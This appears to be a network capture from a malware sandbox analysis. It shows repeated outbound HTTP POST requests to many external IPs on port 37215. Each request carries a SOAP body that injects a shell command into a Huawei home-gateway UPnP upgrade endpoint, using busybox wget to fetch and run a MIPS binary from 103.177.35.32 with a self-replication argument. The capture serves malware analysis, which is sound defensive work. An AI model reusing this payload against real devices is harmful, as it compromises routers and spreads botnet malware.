                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3230192.168.2.233497241.255.167.15537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661763906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3231192.168.2.2355000197.38.130.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661773920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3232192.168.2.2337756157.117.139.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661984921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3233192.168.2.2342256197.108.223.7937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661995888 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3234192.168.2.2345440157.131.206.23737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.662003994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3235192.168.2.2348660197.10.72.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.662056923 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3236192.168.2.2358150106.35.125.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.669572115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3237192.168.2.234865819.176.224.17337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.669615984 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3238192.168.2.2337200217.55.231.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.669615984 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3239192.168.2.235608041.59.105.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.669617891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
